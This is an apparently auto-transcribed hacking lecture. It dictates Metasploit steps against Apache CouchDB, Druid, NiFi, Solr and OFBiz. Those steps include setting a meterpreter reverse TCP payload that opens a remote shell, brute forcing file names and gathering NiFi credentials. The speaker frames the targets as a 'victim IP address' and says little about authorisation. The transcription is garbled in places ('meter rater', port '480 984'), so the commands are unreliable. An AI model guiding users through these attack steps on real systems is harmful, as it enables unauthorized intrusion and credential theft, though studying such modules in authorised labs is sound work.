doing well. I am your Mr. Professional Hacker, and today our topic is the Metasploit Framework again. This tool allows you to exploit Android, iPhone, websites, social media accounts, web applications, and Windows PCs. With Metasploit, you can exploit all of these. So let's move on to the practical part, as I already covered the theory in the first lecture. So here first thing I need to do, just share this link, share this live class link on my Facebook page and also on my Facebook group. So because this is a very important, and which persons available right now, join to me live here. Okay. Exploit tool lecture in English is started. Join to me now live. Class is started. And just wait and while because this lecture maybe it takes some time, so I want actually people join to me live. Understand, if all people join to me live, then it's good for me and you and for all persons who are interested to learn hacking, because this tool is a very great. Understand, and it's a very amazing. So I want from all person join to me live. Understand, because it's a very amazing tool. Started. So here is, it's almost take 1 minute more, please. I just sharing simple. Join to me live now and start to learn hacking with me, because I will teach you with the advanced level and with practical, so you can learn with better. Okay, so let's start our practical session. Okay, start our practical session and move on our Kali Linux, and here you need to type on this one Metasploit Framework, and almost 3 more lectures upcoming on Metasploit, because this is a very important, and our first command is Apache CouchDB arbitrary command execution, and I will told you about description. Description is exploits Apache CouchDB variants to execute arbitrary commands by using this first command. And also I will tell you Apache CouchDB. What is Apache CouchDB? Now here is our Metasploit is started, and it's take almost 1 minute, I think. Okay, Apache called DBCMDEXE description. This exploit targets Coach DB versions vulnerable to command execution through specified API calls. It leverages poorly secured administrative endpoints to execute arbitrary operating system commands, target system, CouchDB installation, particularly on Unix or Windows. Understand? Usage often using in testing for improper access restrictions on CouchDB API endpoints. Now here is we need to start practical session. Now here just you type here, but I set this one on here because if I type then it's take a more time. We need to actually copy and paste, just simple thing we need to do, copy and paste, but then screen is blank. Here you need to type just use, simple, use exploit. First is use exploit and then slash, then type here Linux. Okay, then again slash, then type here HTTP, then again slash, then type here Apache. Apache, then type here hyphen, then you type here CouchDB. CouchDB. First you need to check spelling is right. If your spelling is mistake, then it did not work and showed you error. So check complete command, then hit enter, exe. Understand? Now here is our command is almost done, and now hit enter. Okay, now this is done, and now set our host. Understand? Now here you need to type your victim address, but I type here just dummy IP address for your understanding and for your practical understand. Here I type 10, hit enter, and then here I type set r port, and r port you can type here simple. I type here 5984. Stand? Okay. Now here set. Now here everything is okay. Now here we type exploit. Now it's failed. What it says, one or more option failed to validate our host. It's mean here is our host command is not right. That's why it's not working. So we need to check this. I need to check on system, and please subscribe to my channel, like, share and comment. I need to check this one first. Here our host, actually this is our host. Here I type our host, simple thing here 192.168.1.100, hit enter, and now I type here set, and again I need to copy the set r port. Port is, I type here for example port, sorry it's dual, need to set this one, and here I type for example 8080, but it's actually want 5984, and hit enter, then hit run. Now it's not working again. We need to type second thing, Understand? Because sometime it's showed some error and we need to set host, which host we want to do working on it. Type 192.168.1.100, hit enter, set our port, and here we need to type 8080. For example, I type here 8080, hit enter. Understand? Now I type this one. It's actually no, it's changed here. No, everything is okay. Now again we need to type here complete our host. Here I type again our host. Actually this is complete command 192.168.1.10, hit enter. Then again set and r port, and here again we need to type command 5984, hit enter. And now if it's again showed error, then it's mean our command, our port is not good. Here is I type exploit. We just wait. Now here is it start working, understand, but it's failed. Why it's failed? Because which IP address I provide to his, it's not real, it's dummy IP address, don't have any data, don't have anything available on it, so that's why it showed error. Now let's move on next command, and I will tell you about the description. Okay, now second command is Apache droid remote command execution. Description: allows remote command execution on Apache droid version 0.20.0. Here again we need to type use exploit. No, first is okay. We need to set here again second one 192 target IP address 192.168.1.100, and I told you again it's a dummy IP address. You need to type here your victim IP address, which do you want to working on it. Understand? Now here I type set and type here payload Linux /x86, then again slash meter operator again reverse, and again here type TCP -TCP. First thing you need to check complete spelling which you type here, okay, and after see if done, then hit enter. Okay, now it's done, payload is created, and now here set lhost. First is R host and second is L host. Here you type 192.168.1. Again I type here 200. Okay, it's also example IP address, and hit enter. Now I type here set L port and type here 8080, hit enter, and now type here exploit. Understand? Now it start working. Again it start working. Okay, but I can't going in deep because my duty is just this is you can understand what I do. Okay, so this is main thing. Okay, let's move on. Next command is Apache NIFI API remote code execution. Description: executes remote commands on Apache NIFI instances via the API. Now again, first line is almost done and ready, and second one we need to set here second thing. Host, then you type here 192.168.1.100, hit enter, and then you type here set r host 8080, understand? Oh, sorry, r port. Now r port, hit enter. Okay, then again need to type here set payload for this. Yes, again here you type payload and type here Linux slash, then type here x86, then again slash, then type here meter rater, meter rater, then type here slash reverse hyphen tcp, understand, and hit enter. And then again you type here set lhost and type here 192.168.1.0, hit enter. Then you type here set l port, again type here 8080, hit enter, and type here exploit. Sorry, exploit is small words, exploit, hit enter. Now again it start working, understand, and provide you result. But when provide you result, then when you give him right command and right port and right IP address. Okay, otherwise it's not working. Okay, let's move on. Next command is Apache Solar Backup Restore API's remote code execution, and I will told you about all these end of the practical, understand. Description: exploits backup and restore API endpoints in Apache Solar for RCE. Here is first line is done, and we need to set here again our host 192.168.1.100, hit enter, and need to type here again set r port 480 984, hit enter. And now again need to type here actually same payload use in all format, understand. Just type here set payload and Linux x86, and type here meter rater slash reverse hyphen tcp, understand, hit enter. And then again type set l host 192.168.1.100, 200. Understand? And next is set L port. Type here again, I again type here 80, 90, 984. Enter. And then again you type here exploit. Hit enter. Okay. Now it's start working. So it's actually a fourth command. Okay, let's move and clear our terminal. Let's move on. Next command is number 5, Apache ofbiz xml-rpc java deserialization. Okay, description: exploit xml-rpc java deserialization in Apache ofbiz of our RCE. Again, same method you can use, and same commands you can use, and just type there your victim IP address and port. Okay, now let's move on. Next command is auxiliary scanner, Apache optional bleed scanners. Here is a scans for option bleed vulnerability and Apache server. Here is something is different. You use here use actually auxiliary understand, then scanner, then here type HTTP, then type again, then type Apache, then type here fun opt option bleed Apache option bleed. Understand? Hit enter. And now here is no results from search. Actually here is something is I think something is missing here, that's why it's not working. We need to check here, and we need to copy this one. Okay, because I don't do copy this one, it's not working proper. So here is we need to check this same thing, option bleed, and type here simple, hit enter. Okay, now it's good, but maybe before we will do some mistake there. I need to type here L hosts. Here I start working again, same like previous one. I R host 192.168.1.168.1.200. Hit enter, and then type here just simple run. Okay, now do some wait, it start working. It's actually do scanning, start scanning, and it's take a lot of time. So I think you understand what I do here. So here you need to cut and move on next. Okay, next is Apache HTTPD mode negotiations file name brooter. Okay, attempts to brute force file names using mode negotiations. Simple thing is just you type copy and paste. You use this one, type here this one, just hit enter, and just set session ID. Okay, collect Apache, sorry, here you type again set hosts, set R hosts. Again same 192.168.1. 100, then again 192.168.1.200. Hit enter and then type here run. Again run. Again run, sorry. Hit enter and now it start working. Brute force attack is starting. Okay, next is Apache NIFI credentials gather. Okay, when you do brute force attack, then it's provide you a detail about server and then you get a session ID. Understand? When you use this one command, and then you type here your session ID, hit enter, and then you type here set session, understand, and type in front of this session ID which you get from after brute force attacking, understand, and when you type here ID and then hit enter, then it's make same like others commands, and then you type run, then it start working. Okay, let's move on. Next command is command summary for Metasploits. Now here is a actually theory, our practical is end here, and I need to told these all things because these all are very important thing. Okay, let's move on our some theory. Okay, command summary for Metasploits. First is use select the exploit, then set our host, sets the target IP address, then set payload, specify the payload for execution, then exploit executes the select exploit on the target, then run the auxiliary or post exploit module. Okay, I told you before starting the lecture, I told about you Apache CouchDB arbitrary command execution. What is this? I will tell you. And now I will tell you about second Apache Droid remote command execution. Listen description. Apache Droid is a data store platform, and this exploit targets vulnerabilities allowing remote code execution via GNDI injection or through JavaScript processing flaws in certain droids versions. Target system Apache droids versions with open endpoints that process specific user data unsafely. Understand? And usage allow penetration testers to verify the vulnerability by attempting to execute commands remotely on the target data server. Understand? Now let's move on. Next, Apache NIFI API remote code execution. What is this? Apache NIFI is a data flow automation tool. This RCE exploit allows attackers to gain control over the NIFI system by exploiting vulnerabilities in API endpoints that are not securely restricted. Target system Apache NIFI installations with improperly secured APIs. Understand? Typically used to test whether NIFI API security measures are effective in preventing unauthorized remote code execution. Number 4, Apache Solar Backup Restore API remote code execution. What is this? Apache Solar, a search platform, has backup and restore APIs vulnerable to RCE, especially if the instance is configured without adequate authentication and is exposed to unsafe endpoints. Apache Solr installation vulnerable to command injection via the backup store APIs, allowing testing of Solr configuration by executing code through insecure backup or restore endpoints. Understand? Number 5, Apache OFBiz XML RPC Java deserialization. Understand? What is this? Apache OFBiz, an enterprise resource planning software, can be exploited through a Java deserialization vulnerability. This vulnerability is found in the XML-RPC service and can allow an attacker to remotely execute Java code. Understand? Apache OFBiz versions with XML-RPC enabled and unsecured, used in penetration testing to verify if the deserialization flaws allow arbitrary code execution. Number 6, Apache Option Bleed Scanners. What is this? Option bleed is a vulnerability affecting Apache web servers. It occurs when the server leaks parts of other users' memory in HTTP options requests, revealing potentially sensitive data. Apache HTTPD servers vulnerable to the option bleed bug. The scanner checks if a target Apache server leaks data through the option HTTP request. Number 7, Apache HTTPD mode negotiations file browser. What is this? This auxiliary tool targets the mode negotiations module in Apache HTTPD, which can sometimes allows brute forcing of file names when content negotiation is enabled. Apache HTTP servers using and mode negotiations. This tool allows for brute forcing file name on the server by testing different file name possibilities to see if content negotiation will reveal them. Number 8, Apache NIFI credentials gather. What is this? This auxiliary module is used to extract credentials from an Apache NIFI instance. NIFI stores configurations details including credentials with, if unprotected, can be accessed and gathered by an unauthorized user. Apache NIFI installation with accessible credential storage, useful in security audits of NIFI setups to ensure credentials are securely stored and not vulnerable to unauthorized extraction. Understand? And with that, today's lecture comes to end. Make sure to subscribe the channel, like, share and comment, press the bell icon and don't